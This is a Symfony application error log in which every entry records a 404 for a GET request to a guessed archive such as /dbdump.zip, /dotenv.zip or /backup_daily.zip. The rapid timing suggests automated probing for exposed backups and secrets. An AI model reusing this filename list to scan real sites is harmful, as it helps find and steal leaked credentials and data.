  8396. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8397. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node_modules.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node_modules.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8398. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbdump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbdump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8399. [2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8400. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8401. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /digitalocean.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /digitalocean.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8402. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8403. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8404. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8405. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /static.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /static.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8406. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8407. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dotenv.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dotenv.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8408. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_monthly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_monthly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8409. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8410. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8411. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /whm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /whm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8412. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8413. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8414. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /localhost.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /localhost.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8415. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8416. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8417. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8418. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8419. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /prototype.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /prototype.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8420. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8421. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8422. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cloud.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cloud.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8423. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8424. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8425. [2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /neo4j.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /neo4j.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8426. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rest.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rest.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8427. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8428. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8429. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bower_components.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bower_components.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8430. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8431. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8432. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8433. [2025-12-20 21:33:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8434. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8435. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8436. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /devtools.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /devtools.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8437. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8438. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /src.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /src.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
